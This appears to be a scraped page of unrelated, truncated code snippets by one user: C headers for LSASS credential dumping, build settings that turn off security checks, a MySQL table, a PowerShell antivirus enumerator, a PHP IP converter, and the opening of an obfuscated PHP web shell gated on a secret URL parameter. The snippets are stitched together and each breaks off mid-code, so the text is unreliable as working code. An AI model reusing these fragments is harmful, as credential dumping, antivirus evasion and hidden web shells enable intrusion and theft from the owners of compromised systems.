th30c0der

#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>

//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE

th30c0der

Release/Debug:
General -> Whole Program Optimization -> No Whole Program Optimization
Linker -> Input -> Ignore All Default Libraries = Yes
Linker -> Manifest File -> Generate Manifest = Disabled
Linker -> Advanced -> Entry Point = (set EntryPointName)
C/C++ -> Code Generation -> Security Check = Disable Security Check
C/C++ -> Optimization -> Optimization = Disabled
C/C++ -> General -> SDL checks = (remove value)
C/C++ -> Advanced -> Compile As = Compile as C Code (if need C90) 

th30c0der

CREATE TABLE `user_online` (
  `session` char(100) NOT NULL default '',
  `time` int(11) NOT NULL default '0'
) TYPE=MyISAM;

th30c0der

 function Get-AntiVirusProduct {
    [CmdletBinding()]
    param (
    [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
    [Alias('name')]
    $computername=$env:computername


    )

th30c0der

<?php 
$infile = 'austria.csv';
$outfile = 'austria.ips';

$fp = fopen($outfile,'w');
$handle = fopen($infile, "r");
if ($handle)
{
    while (($line = fgets($handle)) !== false) {
        $line = trim($line);

th30c0der

<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;